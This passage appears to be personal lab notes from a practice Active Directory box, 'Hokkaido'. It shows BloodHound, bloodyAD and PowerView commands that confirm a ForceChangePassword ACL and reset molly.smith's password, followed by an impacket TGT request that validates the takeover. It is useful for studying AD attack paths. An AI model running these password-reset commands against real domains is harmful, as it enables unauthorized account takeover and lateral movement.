ForceChangePassword
/Practice/Hokkaido/3-Exploitation/attachments/{A0D7A68A-A105-4C3F-A04C-41D8C830FC29}.png)
/Practice/Hokkaido/3-Exploitation/attachments/{A4B442BD-8556-4F60-BB88-698376956431}.png)
During the BloodHound enumeration, it has been identified that the hazel.green user has the transitive ForceChangePassword access over the molly.smith user via a membership to the tier2-admins group
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hazel.green@dc.hokkaido-aerospace.com.ccache bloodyAD -d HOKKAIDO-AEROSPACE.COM -k --host dc.hokkaido-aerospace.com get writable --detail
distinguishedName: CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
pwdLastSet: WRITE
[...REDACTED...]
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hazel.green@dc.hokkaido-aerospace.com.ccache powerview HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -Identity molly.smith -SecurityIdentifier Tier2-Admins'
Logging directory is set to /home/kali/.powerview/logs/hokkaido-aerospace-dc.hokkaido-aerospace.com
[2025-04-25 18:10:18] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
ObjectDN : CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID : S-1-5-21-3227296914-974780204-1325941497-1107
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Force-Change-Password
InheritanceType : User
SecurityIdentifier : HOKKAIDO-AEROSPACE\Tier2-Admins
ObjectDN : CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID : S-1-5-21-3227296914-974780204-1325941497-1107
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Pwd-Last-Set
InheritanceType : User
SecurityIdentifier : HOKKAIDO-AEROSPACE\Tier2-Admins
ObjectDN : CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID : S-1-5-21-3227296914-974780204-1325941497-1107
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : User
SecurityIdentifier : HOKKAIDO-AEROSPACE\Tier2-AdminsConfirming with bloodyAD and PowerView
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hazel.green@dc.hokkaido-aerospace.com.ccache powerview HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Set-DomainUserPassword -Identity molly.smith -AccountPassword qwer1234'
Logging directory is set to /home/kali/.powerview/logs/hokkaido-aerospace-dc.hokkaido-aerospace.com
[2025-04-25 18:13:29] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-04-25 18:13:29] [Set-DomainUserPassword] Principal CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com found in domain
[2025-04-25 18:13:29] [Set-DomainUserPassword] Password has been successfully changed for user Molly.Smith
[2025-04-25 18:13:29] Password changed for molly.smith
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hazel.green@dc.hokkaido-aerospace.com.ccache bloodyAD -d HOKKAIDO-AEROSPACE.COM -k --host dc.hokkaido-aerospace.com set password molly.smith qwer1234
[+] Password changed successfully!Using the TGT of the hazel.green user, resetting password of the molly.smith user to qwer1234
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/molly.smith@dc.hokkaido-aerospace.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: qwer1234
[*] Saving ticket in molly.smith@dc.hokkaido-aerospace.com.ccacheValidated
TGT generated for the molly.smith user